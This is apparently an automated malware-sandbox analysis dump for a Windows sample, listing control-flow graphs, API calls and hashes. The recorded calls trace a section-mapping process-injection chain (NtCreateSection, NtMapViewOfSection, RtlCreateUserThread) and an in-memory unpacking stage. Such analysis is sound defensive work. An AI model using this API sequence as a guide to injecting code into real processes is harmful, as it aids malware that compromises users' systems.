                                                                                                                      control_flow_graph 209 4014d3-4014eb 211 4014d8-4014f8 209->211 212 4014ed-4014f4 209->212 213 4014fb-40150e call 40113b 211->213 223 4014f1-4014f4 211->223 212->213 219 401510 213->219 220 401513-401518 213->220 219->220 225 40183d-401845 220->225 226 40151e-40152f 220->226 223->213 225->220 231 40184a 225->231 229 401535-40155e 226->229 230 40183b 226->230 229->230 239 401564-40157b NtDuplicateObject 229->239 230->231 232 401861 231->232 233 401852-40185d 231->233 232->233 234 401864-40188e call 40113b 232->234 233->234 239->230 241 401581-4015a5 NtCreateSection 239->241 244 401601-401627 NtCreateSection 241->244 245 4015a7-4015c8 NtMapViewOfSection 241->245 244->230 248 40162d-401631 244->248 245->244 247 4015ca-4015e6 NtMapViewOfSection 245->247 247->244 250 4015e8-4015fe 247->250 248->230 251 401637-401658 NtMapViewOfSection 248->251 250->244 251->230 253 40165e-40167a NtMapViewOfSection 251->253 253->230 255 401680 call 401685 253->255
                                                                                                                      APIs
                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1858486535.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_edrecib.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Section$CreateDuplicateObjectView
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1652636561-0
                                                                                                                      • Opcode ID: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                                                                                                      • Instruction ID: 8103355e2e942ff69e8c14b284ac6daeef9955d1bae1450e847efa7766c746d9
                                                                                                                      • Opcode Fuzzy Hash: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                                                                                                      • Instruction Fuzzy Hash: 245127B1900245BBEF209F91CC48FABBBB8EF86B00F144159FA11BA2A5D6719941CB24

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 257 4014f7-40150e call 40113b 261 401510 257->261 262 401513-401518 257->262 261->262 264 40183d-401845 262->264 265 40151e-40152f 262->265 264->262 270 40184a 264->270 268 401535-40155e 265->268 269 40183b 265->269 268->269 278 401564-40157b NtDuplicateObject 268->278 269->270 271 401861 270->271 272 401852-40185d 270->272 271->272 273 401864-40188e call 40113b 271->273 272->273 278->269 280 401581-4015a5 NtCreateSection 278->280 283 401601-401627 NtCreateSection 280->283 284 4015a7-4015c8 NtMapViewOfSection 280->284 283->269 287 40162d-401631 283->287 284->283 286 4015ca-4015e6 NtMapViewOfSection 284->286 286->283 289 4015e8-4015fe 286->289 287->269 290 401637-401658 NtMapViewOfSection 287->290 289->283 290->269 292 40165e-40167a NtMapViewOfSection 290->292 292->269 294 401680 call 401685 292->294
                                                                                                                      APIs
                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1858486535.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_edrecib.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1546783058-0
                                                                                                                      • Opcode ID: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                                                                                                      • Instruction ID: 2227e086d9928dda04f460d80950503c889386f6503bf0ca9f5f85cfbacfc3af
                                                                                                                      • Opcode Fuzzy Hash: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                                                                                                      • Instruction Fuzzy Hash: 8B5107B1900249BFEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D6719945CB24

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 296 402f8f-402fb3 297 4030d2-4030d7 296->297 298 402fb9-402fd1 296->298 298->297 299 402fd7-402fe8 298->299 300 402fea-402ff3 299->300 301 402ff8-403006 300->301 301->301 302 403008-40300f 301->302 303 403031-403038 302->303 304 403011-403030 302->304 305 40305a-40305d 303->305 306 40303a-403059 303->306 304->303 307 403066 305->307 308 40305f-403062 305->308 306->305 307->300 310 403068-40306d 307->310 308->307 309 403064 308->309 309->310 310->297 311 40306f-403072 310->311 311->297 312 403074-4030cf RtlCreateUserThread NtTerminateProcess 311->312 312->297
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1858486535.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_edrecib.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcessTerminateThreadUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1921587553-0
                                                                                                                      • Opcode ID: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                                                                                                      • Instruction ID: aa2530698c6aa4494656ae1f9c01ee64b6dc24c6198c14284b052c109098bfb9
                                                                                                                      • Opcode Fuzzy Hash: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                                                                                                      • Instruction Fuzzy Hash: 1F415832618E0C4FD778EE6CA88966377D5E794351B56437AE809D3388EE30DC5183C5

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 5b003c-5b0047 1 5b0049 0->1 2 5b004c-5b0263 call 5b0a3f call 5b0e0f call 5b0d90 VirtualAlloc 0->2 1->2 17 5b028b-5b0292 2->17 18 5b0265-5b0289 call 5b0a69 2->18 20 5b02a1-5b02b0 17->20 22 5b02ce-5b03c2 VirtualProtect call 5b0cce call 5b0ce7 18->22 20->22 23 5b02b2-5b02cc 20->23 29 5b03d1-5b03e0 22->29 23->20 30 5b0439-5b04b8 VirtualFree 29->30 31 5b03e2-5b0437 call 5b0ce7 29->31 33 5b04be-5b04cd 30->33 34 5b05f4-5b05fe 30->34 31->29 36 5b04d3-5b04dd 33->36 37 5b077f-5b0789 34->37 38 5b0604-5b060d 34->38 36->34 40 5b04e3-5b0505 36->40 41 5b078b-5b07a3 37->41 42 5b07a6-5b07b0 37->42 38->37 43 5b0613-5b0637 38->43 54 5b0517-5b0520 40->54 55 5b0507-5b0515 40->55 41->42 45 5b086e-5b08be LoadLibraryA 42->45 46 5b07b6-5b07cb 42->46 44 5b063e-5b0648 43->44 44->37 47 5b064e-5b065a 44->47 53 5b08c7-5b08f9 45->53 49 5b07d2-5b07d5 46->49 47->37 52 5b0660-5b066a 47->52 50 5b07d7-5b07e0 49->50 51 5b0824-5b0833 49->51 57 5b07e2 50->57 58 5b07e4-5b0822 50->58 60 5b0839-5b083c 51->60 59 5b067a-5b0689 52->59 61 5b08fb-5b0901 53->61 62 5b0902-5b091d 53->62 56 5b0526-5b0547 54->56 55->56 63 5b054d-5b0550 56->63 57->51 58->49 64 5b068f-5b06b2 59->64 65 5b0750-5b077a 59->65 60->45 66 5b083e-5b0847 60->66 61->62 67 5b05e0-5b05ef 63->67 68 5b0556-5b056b 63->68 69 5b06ef-5b06fc 64->69 70 5b06b4-5b06ed 64->70 65->44 71 5b084b-5b086c 66->71 72 5b0849 66->72 67->36 74 5b056f-5b057a 68->74 75 5b056d 68->75 76 5b074b 69->76 77 5b06fe-5b0748 69->77 70->69 71->60 72->45 78 5b059b-5b05bb 74->78 79 5b057c-5b0599 74->79 75->67 76->59 77->76 84 5b05bd-5b05db 78->84 79->84 84->63
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005B024D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1858660361.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_5b0000_edrecib.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID: cess$kernel32.dll
                                                                                                                      • API String ID: 4275171209-1230238691
                                                                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                      • Instruction ID: 7551dfa21bb43cba0658288d1fd6cf974fef82f8ba6c86bf0450c771147d3be8
                                                                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                      • Instruction Fuzzy Hash: 4F526874A00229DFDB64CF58C985BADBBB1BF09304F1480D9E94DAB291DB30AE85DF14

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 313 541cc0-541cd9 314 541cdb-541cdd 313->314 315 541ce4-541cf0 CreateToolhelp32Snapshot 314->315 316 541cdf 314->316 317 541d00-541d0d Module32First 315->317 318 541cf2-541cf8 315->318 316->315 319 541d16-541d1e 317->319 320 541d0f-541d10 call 54197f 317->320 318->317 323 541cfa-541cfe 318->323 324 541d15 320->324 323->314 323->317 324->319
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00541CE8
                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 00541D08
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1858608967.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_530000_edrecib.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3833638111-0
                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                      • Instruction ID: 36ac583e1c1f0f59f407e493ba2815789a2df5f0767acc7688af92a70698274b
                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                      • Instruction Fuzzy Hash: 7AF0C231500B116BD7202BF59C8DBAA7AE8BF493ADF100128E642910C0CA70EC854668

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 326 5b0e0f-5b0e24 SetErrorMode * 2 327 5b0e2b-5b0e2c 326->327 328 5b0e26 326->328 328->327
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE(00000400,?,?,005B0223,?,?), ref: 005B0E19
                                                                                                                      • SetErrorMode.KERNELBASE(00000000,?,?,005B0223,?,?), ref: 005B0E1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1858660361.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_5b0000_edrecib.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2340568224-0
                                                                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                      • Instruction ID: e6f0b986f79c47f2df78b5900a9022620743f9650b9358d5e1040a707868e860
                                                                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                      • Instruction Fuzzy Hash: 0FD0123114512877D7002A94DC09BCE7F1CDF05B62F008411FB0DD9080C770994046E5

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 329 40bc65-40bc6f call 40baca 331 40bc74-40bc81 329->331
                                                                                                                      APIs
                                                                                                                      • __setmbcp.LIBCMT ref: 0040BC6F
                                                                                                                        • Part of subcall function 0040BACA: getSystemCP.LIBCMT ref: 0040BAEF
                                                                                                                        • Part of subcall function 0040BACA: __malloc_crt.LIBCMT ref: 0040BB05
                                                                                                                        • Part of subcall function 0040BACA: __setmbcp_nolock.LIBCMT ref: 0040BB28
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1858508936.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_40b000_edrecib.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: System__malloc_crt__setmbcp__setmbcp_nolock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1786829287-0
                                                                                                                      • Opcode ID: 3d85cd77d6638d75a46b3ac3e0861278f81fee0c3a07de576723b0644236972b
                                                                                                                      • Instruction ID: ab897626d73dbb0745f55126157d0f546fefb95dfe1eb26feed99d3202435efc
                                                                                                                      • Opcode Fuzzy Hash: 3d85cd77d6638d75a46b3ac3e0861278f81fee0c3a07de576723b0644236972b
                                                                                                                      • Instruction Fuzzy Hash: 53C02B510080800CD7008B207C0570F3550EF41330F24022EF010C04C6DB695440314C

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 554 401891-4018c1 561 4018d2 554->561 562 4018c9-4018f7 call 40113b Sleep call 4013bf 554->562 561->562 568 401906-40194c call 40113b 562->568 569 4018f9-401901 call 4014b5 562->569 569->568
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                        • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                        • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1858486535.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_edrecib.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4152845823-0
                                                                                                                      • Opcode ID: 6c70d353b433dda2f53fd46e2b53eb18a00404936ca24d3f60717acb78d32f73
                                                                                                                      • Instruction ID: 625976beb622557468fde4da7c406050b614696d38d370b0d4d52ea32007e278
                                                                                                                      • Opcode Fuzzy Hash: 6c70d353b433dda2f53fd46e2b53eb18a00404936ca24d3f60717acb78d32f73
                                                                                                                      • Instruction Fuzzy Hash: 2C0192B260C204EBEB002991CC91EBA32299B04350F308133B603790F1D57C8753B36F

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 583 4018a9-4018c1 590 4018d2 583->590 591 4018c9-4018f7 call 40113b Sleep call 4013bf 583->591 590->591 597 401906-40194c call 40113b 591->597 598 4018f9-401901 call 4014b5 591->598 598->597
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                        • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                        • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1858486535.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_edrecib.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4152845823-0
                                                                                                                      • Opcode ID: a0416c7ea6c8b2beaa64009cd037ce3695af2c8d86f7782f0dc7d3fc67dd3c49
                                                                                                                      • Instruction ID: 01e10882b1c060c9bcf7afaa20a424b8b06e3eaca9db3e31c9d827ddeb5dfa52
                                                                                                                      • Opcode Fuzzy Hash: a0416c7ea6c8b2beaa64009cd037ce3695af2c8d86f7782f0dc7d3fc67dd3c49
                                                                                                                      • Instruction Fuzzy Hash: 620178B260C204EBEB042A91CC91EBE2225AB08320F308133B603790F1D67C8753B72F
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                        • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                        • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1858486535.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_edrecib.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4152845823-0
                                                                                                                      • Opcode ID: 6b9a7ba5e763362e57e967b3ef273788d2906451f38bbd38aba7de38a4ba4a16
                                                                                                                      • Instruction ID: 091d8ab5f34d30388949969244c388a12b20eca364eb9837eec97541f3976fe9
                                                                                                                      • Opcode Fuzzy Hash: 6b9a7ba5e763362e57e967b3ef273788d2906451f38bbd38aba7de38a4ba4a16
                                                                                                                      • Instruction Fuzzy Hash: 46015AB360C244EBEB016A90C8A1EAA37659B48310F308577B643790F1D67C8753A72F
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                        • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                        • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1858486535.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_edrecib.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4152845823-0
                                                                                                                      • Opcode ID: b76e6f8ea108e6f900b2be892df91fc6f607bea987df0946b9f50da5a95319bc
                                                                                                                      • Instruction ID: 35dd9e0e0d775fbf54de8accc2db9d3c4b904cb042cfc7da377ce8c3fe766ee0
                                                                                                                      • Opcode Fuzzy Hash: b76e6f8ea108e6f900b2be892df91fc6f607bea987df0946b9f50da5a95319bc
                                                                                                                      • Instruction Fuzzy Hash: 5501A2B6208244EBDB015AA4CD52AEE37259B04320F244177FA13BA0F1DA7CC653E76F
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005419D0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1858608967.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_530000_edrecib.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                      • Instruction ID: 995cba72c42569d995567d0f688205392ed3a7af4c51bcef391cae3ba8d7b1de
                                                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                      • Instruction Fuzzy Hash: 18113C79A40208EFDB01DF98C985E98BFF5AF08351F158094F9889B362D371EA90DF84
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                        • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                        • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1858486535.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_400000_edrecib.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4152845823-0
                                                                                                                      • Opcode ID: b859de65e3e4eca09ea0fa0fd0a149a7b7b601be189d05055e302c384b2899de
                                                                                                                      • Instruction ID: 66a051fc3b1640109372302853407978bf892c336f6e5febd052736601f380b8
                                                                                                                      • Opcode Fuzzy Hash: b859de65e3e4eca09ea0fa0fd0a149a7b7b601be189d05055e302c384b2899de
                                                                                                                      • Instruction Fuzzy Hash: DBF04FB6208244EBDB006AD1CC51EAE33699B49364F304173B613790F5D67C8653E72F
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000007.00000002.1858508936.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_7_2_40b000_edrecib.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3016257755-0
                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                      • Instruction ID: e950241f73d42944cd710210a14d6297da0e762eb9f253b78aae5045d500f0ca
                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                      • Instruction Fuzzy Hash: 5511723210014ABBCF229E84CC418EE3F26BB58354B188436FE1864971D33AC9B5AF85